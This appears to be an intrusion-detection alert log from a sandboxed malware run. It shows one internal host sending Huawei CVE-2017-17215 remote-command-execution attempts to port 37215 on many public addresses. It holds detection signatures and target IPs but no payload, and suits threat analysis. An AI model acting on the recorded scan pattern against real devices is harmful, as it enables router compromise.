                                                        06/13/24-21:32:56.758644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717637215192.168.2.14197.132.255.26
                                                        06/13/24-21:33:13.214520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5717437215192.168.2.14197.181.155.248
                                                        06/13/24-21:33:11.154765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4303837215192.168.2.1441.15.57.164
                                                        06/13/24-21:32:07.401335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861637215192.168.2.14197.18.119.111
                                                        06/13/24-21:32:11.506249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727637215192.168.2.14197.250.48.63
                                                        06/13/24-21:32:40.372727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160437215192.168.2.1441.217.186.245
                                                        06/13/24-21:33:09.101970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508437215192.168.2.14197.27.180.218
                                                        06/13/24-21:33:17.310192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851437215192.168.2.14156.224.11.226
                                                        06/13/24-21:32:23.937651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064837215192.168.2.14156.58.136.164
                                                        06/13/24-21:32:32.155498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413637215192.168.2.14156.166.189.225
                                                        06/13/24-21:32:56.757888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681237215192.168.2.14197.15.195.239
                                                        06/13/24-21:32:23.836144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318637215192.168.2.14197.133.119.105
                                                        06/13/24-21:32:23.940564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432037215192.168.2.1441.51.121.139
                                                        06/13/24-21:32:42.409196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025237215192.168.2.14156.208.99.245
                                                        06/13/24-21:32:28.027868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.1441.109.88.168
                                                        06/13/24-21:32:46.524386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962837215192.168.2.14197.147.79.111
                                                        06/13/24-21:32:01.222950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511837215192.168.2.1441.136.79.242
                                                        06/13/24-21:32:23.943763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520237215192.168.2.1441.148.62.205
                                                        06/13/24-21:31:57.090462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347437215192.168.2.14156.110.128.12
                                                        06/13/24-21:33:00.885081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220037215192.168.2.14197.241.168.192
                                                        06/13/24-21:33:05.016304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958637215192.168.2.14156.212.203.151
                                                        06/13/24-21:32:42.422400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663837215192.168.2.1441.127.53.37
                                                        06/13/24-21:32:54.710120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230037215192.168.2.1441.170.228.236
                                                        06/13/24-21:33:02.914209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597237215192.168.2.14197.33.96.217
                                                        06/13/24-21:33:09.110826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431637215192.168.2.14197.242.158.54
                                                        06/13/24-21:32:13.546991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14197.88.77.75
                                                        06/13/24-21:33:02.914457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909437215192.168.2.14156.94.46.69
                                                        06/13/24-21:32:17.697123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170837215192.168.2.14156.110.127.7
                                                        06/13/24-21:32:36.269415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264637215192.168.2.1441.163.199.220
                                                        06/13/24-21:33:04.991143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454637215192.168.2.14156.66.204.103
                                                        06/13/24-21:32:19.727429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341837215192.168.2.1441.139.94.47
                                                        06/13/24-21:32:23.938624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959637215192.168.2.14197.238.111.75
                                                        06/13/24-21:32:58.844172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.14156.49.223.39
                                                        06/13/24-21:32:19.752757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.14197.120.145.209
                                                        06/13/24-21:32:34.195779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399837215192.168.2.14197.110.168.242
                                                        06/13/24-21:33:00.872079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009837215192.168.2.14197.221.155.148
                                                        06/13/24-21:32:48.572563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152637215192.168.2.14156.196.57.53
                                                        06/13/24-21:33:04.988144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14197.0.128.7
                                                        06/13/24-21:32:58.842402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714437215192.168.2.1441.106.22.97
                                                        06/13/24-21:32:21.802338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390237215192.168.2.1441.237.92.54
                                                        06/13/24-21:32:40.376520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796837215192.168.2.14156.1.75.17
                                                        06/13/24-21:32:42.405292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521837215192.168.2.1441.26.117.65
                                                        06/13/24-21:33:15.276773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975637215192.168.2.14156.191.135.61
                                                        06/13/24-21:31:57.092305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498637215192.168.2.14156.229.85.49
                                                        06/13/24-21:33:11.177349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.14156.9.12.66
                                                        06/13/24-21:32:17.696335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329037215192.168.2.1441.36.68.51
                                                        06/13/24-21:32:21.800545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849037215192.168.2.1441.205.142.37
                                                        06/13/24-21:32:52.669329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.14156.118.25.10
                                                        06/13/24-21:31:57.090254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055237215192.168.2.14197.18.235.27
                                                        06/13/24-21:32:52.658499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195037215192.168.2.14197.35.158.26
                                                        06/13/24-21:33:05.011317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622837215192.168.2.14156.112.243.68
                                                        06/13/24-21:32:07.403082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082637215192.168.2.14197.19.156.91
                                                        06/13/24-21:32:44.476213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14156.37.182.32
                                                        06/13/24-21:32:44.451941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033037215192.168.2.1441.189.200.119
                                                        06/13/24-21:32:05.369171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656437215192.168.2.14197.50.10.172
                                                        06/13/24-21:32:40.358950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037437215192.168.2.1441.135.119.155
                                                        06/13/24-21:32:44.480279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940237215192.168.2.14197.161.15.200
                                                        06/13/24-21:32:30.127352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457037215192.168.2.1441.19.54.46
                                                        06/13/24-21:32:54.725301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468437215192.168.2.14197.252.242.3
                                                        06/13/24-21:32:28.026335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452837215192.168.2.1441.91.247.154
                                                        06/13/24-21:32:21.787877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447437215192.168.2.14197.9.10.228
                                                        06/13/24-21:32:38.318749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527437215192.168.2.14156.203.150.54
                                                        06/13/24-21:32:44.480840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426237215192.168.2.14156.195.122.86
                                                        06/13/24-21:32:50.630984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828037215192.168.2.14197.39.29.99
                                                        06/13/24-21:32:40.358097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685637215192.168.2.14197.202.249.149
                                                        06/13/24-21:32:32.156616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151837215192.168.2.14197.144.238.86
                                                        06/13/24-21:33:02.952898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323037215192.168.2.14197.223.230.72
                                                        06/13/24-21:32:48.554102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358437215192.168.2.14197.66.242.101
                                                        06/13/24-21:32:30.074830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754837215192.168.2.14197.107.224.134
                                                        06/13/24-21:32:19.731753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669037215192.168.2.1441.240.190.167
                                                        06/13/24-21:33:07.054967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748637215192.168.2.1441.201.233.135
                                                        06/13/24-21:32:19.727768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826437215192.168.2.1441.174.200.212
                                                        06/13/24-21:32:25.969577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3393637215192.168.2.1441.117.103.90
                                                        06/13/24-21:32:34.217689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701637215192.168.2.14197.136.109.194
                                                        06/13/24-21:32:54.707281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776437215192.168.2.14156.71.70.204
                                                        06/13/24-21:32:38.298351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727437215192.168.2.1441.199.51.84
                                                        06/13/24-21:32:46.503171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233437215192.168.2.14156.26.149.145
                                                        06/13/24-21:31:57.153899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394437215192.168.2.14197.187.119.218
                                                        06/13/24-21:32:01.240818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.14197.22.13.185
                                                        06/13/24-21:32:30.126109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875037215192.168.2.1441.58.5.204
                                                        06/13/24-21:32:50.630852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071437215192.168.2.14156.78.173.220
                                                        06/13/24-21:32:17.696022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028637215192.168.2.14197.134.98.233
                                                        06/13/24-21:32:19.752103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364637215192.168.2.14197.28.35.150
                                                        06/13/24-21:32:09.438497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990037215192.168.2.14156.215.223.193
                                                        06/13/24-21:32:40.354288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.14156.175.99.18
                                                        06/13/24-21:31:57.090387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503037215192.168.2.1441.170.30.183
                                                        06/13/24-21:32:15.609067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144437215192.168.2.14197.50.250.48
                                                        06/13/24-21:32:48.573538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.1441.131.5.182
                                                        06/13/24-21:33:00.870558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360237215192.168.2.14197.48.96.6
                                                        06/13/24-21:32:03.307972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14197.241.250.223
                                                        06/13/24-21:33:15.277222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442437215192.168.2.14156.36.209.12
                                                        06/13/24-21:32:46.523463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752837215192.168.2.14156.114.6.177
                                                        06/13/24-21:32:42.424038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913637215192.168.2.14197.239.209.106
                                                        06/13/24-21:32:48.569777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908837215192.168.2.14156.202.228.179
                                                        06/13/24-21:32:07.404102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186637215192.168.2.14156.118.220.157
                                                        06/13/24-21:32:03.306689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529837215192.168.2.14156.28.117.211
                                                        06/13/24-21:31:57.137648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755237215192.168.2.1441.189.90.134
                                                        06/13/24-21:33:09.107196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302237215192.168.2.14156.66.72.107
                                                        06/13/24-21:32:09.456575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947037215192.168.2.14197.99.241.203
                                                        06/13/24-21:33:09.131208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5798037215192.168.2.14156.24.159.162
                                                        06/13/24-21:32:34.195300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048237215192.168.2.14197.231.64.16
                                                        06/13/24-21:32:56.785330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325437215192.168.2.14197.85.206.161
                                                        06/13/24-21:32:56.753443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842237215192.168.2.14156.80.131.215
                                                        06/13/24-21:33:09.128553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228637215192.168.2.1441.120.209.11
                                                        06/13/24-21:32:03.309543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855837215192.168.2.14156.210.227.73
                                                        06/13/24-21:32:40.377977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414437215192.168.2.14197.18.90.61
                                                        06/13/24-21:33:00.886976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674837215192.168.2.14156.160.70.88
                                                        06/13/24-21:32:30.124075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681237215192.168.2.1441.155.140.175
                                                        06/13/24-21:33:04.987243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108037215192.168.2.14156.136.215.187
                                                        06/13/24-21:32:23.832780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119237215192.168.2.14156.183.158.130
                                                        06/13/24-21:32:28.026719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285237215192.168.2.14197.129.137.239
                                                        06/13/24-21:32:07.402844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078237215192.168.2.1441.223.147.115
                                                        06/13/24-21:32:19.731196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537437215192.168.2.14197.4.154.226
                                                        06/13/24-21:32:07.401385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628437215192.168.2.14156.224.75.173
                                                        06/13/24-21:32:48.569995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960837215192.168.2.14156.251.57.34
                                                        06/13/24-21:33:02.909036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769037215192.168.2.14197.50.199.17
                                                        06/13/24-21:32:36.266241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936037215192.168.2.14156.224.53.232
                                                        06/13/24-21:32:21.801516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334837215192.168.2.14197.87.141.21
                                                        06/13/24-21:32:32.153884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119637215192.168.2.1441.21.189.253
                                                        06/13/24-21:31:57.133391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725837215192.168.2.14156.41.219.101
                                                        06/13/24-21:32:30.094596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686237215192.168.2.14156.210.21.161
                                                        06/13/24-21:32:30.095646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475237215192.168.2.14156.157.146.45
                                                        06/13/24-21:33:04.991598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932637215192.168.2.1441.64.2.117
                                                        06/13/24-21:32:28.027511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695637215192.168.2.14156.241.251.73
                                                        06/13/24-21:32:09.440466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528837215192.168.2.14197.10.171.184
                                                        06/13/24-21:32:32.171468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070437215192.168.2.14156.239.241.6
                                                        06/13/24-21:32:05.347187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627437215192.168.2.14156.139.239.174
                                                        06/13/24-21:33:09.102199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600437215192.168.2.14156.253.73.252
                                                        06/13/24-21:32:50.612368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.14156.189.95.115
                                                        06/13/24-21:32:05.377939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838837215192.168.2.14197.112.213.25
                                                        06/13/24-21:32:15.609607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548037215192.168.2.14156.35.7.35
                                                        06/13/24-21:32:52.680468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373637215192.168.2.14156.41.224.202
                                                        06/13/24-21:32:07.415385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737237215192.168.2.14197.71.244.127
                                                        06/13/24-21:32:01.240958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022037215192.168.2.1441.69.85.249
                                                        06/13/24-21:33:09.107513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987637215192.168.2.14156.209.60.35
                                                        06/13/24-21:32:38.316240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296037215192.168.2.14197.179.202.215
                                                        06/13/24-21:32:48.570695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647237215192.168.2.14197.138.4.214
                                                        06/13/24-21:33:02.914051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154237215192.168.2.1441.53.92.123
                                                        06/13/24-21:32:32.151300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945637215192.168.2.14156.223.75.97
                                                        06/13/24-21:32:03.278981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766037215192.168.2.14197.207.174.181
                                                        06/13/24-21:32:40.358063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674837215192.168.2.1441.130.139.203
                                                        06/13/24-21:32:21.805485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503837215192.168.2.14156.43.49.157
                                                        06/13/24-21:32:48.554750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313837215192.168.2.14156.90.202.20
                                                        06/13/24-21:32:11.484738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733037215192.168.2.14197.76.189.102
                                                        06/13/24-21:31:59.175738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.1441.160.194.101
                                                        06/13/24-21:32:52.657575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.1441.173.224.117
                                                        06/13/24-21:33:15.271835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005037215192.168.2.14156.8.185.87
                                                        06/13/24-21:32:21.787361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478637215192.168.2.14156.196.154.8
                                                        06/13/24-21:32:46.502751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.1441.5.124.75
                                                        06/13/24-21:32:15.609549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142837215192.168.2.14156.157.8.20
                                                        06/13/24-21:32:58.838355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172437215192.168.2.14156.184.182.93
                                                        06/13/24-21:32:11.487044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088637215192.168.2.14156.37.12.159
                                                        06/13/24-21:33:04.992515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557237215192.168.2.1441.132.121.178
                                                        06/13/24-21:32:23.940354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985237215192.168.2.14197.76.146.84
                                                        06/13/24-21:33:17.338635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997837215192.168.2.1441.72.64.210
                                                        06/13/24-21:32:21.780102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783637215192.168.2.14156.57.153.243
                                                        06/13/24-21:32:48.555256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910437215192.168.2.14197.111.81.182
                                                        06/13/24-21:32:03.277127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.14156.51.40.232
                                                        06/13/24-21:33:02.938151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183037215192.168.2.14197.90.95.149
                                                        06/13/24-21:32:23.942808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797037215192.168.2.1441.26.191.152
                                                        06/13/24-21:32:28.043269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.14197.30.245.88
                                                        06/13/24-21:32:23.830832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869637215192.168.2.1441.137.122.246
                                                        06/13/24-21:32:09.440431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389237215192.168.2.1441.150.80.146
                                                        06/13/24-21:32:36.246840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928637215192.168.2.14156.166.39.37
                                                        06/13/24-21:32:11.507638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648637215192.168.2.14197.125.155.108
                                                        06/13/24-21:32:15.633189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043837215192.168.2.1441.136.185.163
                                                        06/13/24-21:32:38.298258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408837215192.168.2.14197.89.29.44
                                                        06/13/24-21:32:32.164437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190837215192.168.2.14197.169.146.88
                                                        06/13/24-21:32:38.302815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.14197.244.231.172
                                                        06/13/24-21:32:17.696299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145437215192.168.2.14197.228.249.68
                                                        06/13/24-21:32:50.617545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506237215192.168.2.1441.215.66.234
                                                        06/13/24-21:32:05.378674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000437215192.168.2.1441.25.165.229
                                                        06/13/24-21:32:50.612768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443037215192.168.2.14156.217.122.187
                                                        06/13/24-21:32:38.316903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.14156.62.154.72
                                                        06/13/24-21:32:03.277236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594237215192.168.2.14156.75.42.168
                                                        06/13/24-21:33:09.130720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091437215192.168.2.14156.214.186.152
                                                        06/13/24-21:33:11.155811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631237215192.168.2.14197.167.239.113
                                                        06/13/24-21:31:57.091644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258037215192.168.2.14197.198.156.243
                                                        06/13/24-21:32:34.191177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846037215192.168.2.14197.196.26.240
                                                        06/13/24-21:32:21.783681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515037215192.168.2.14197.71.12.73
                                                        06/13/24-21:33:09.091193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322237215192.168.2.14197.213.161.185
                                                        06/13/24-21:32:40.358553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856637215192.168.2.14156.96.96.86
                                                        06/13/24-21:33:07.041908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127037215192.168.2.14197.18.41.132
                                                        06/13/24-21:33:07.042478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517637215192.168.2.14197.211.16.67
                                                        06/13/24-21:33:00.866241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948637215192.168.2.14156.15.80.158
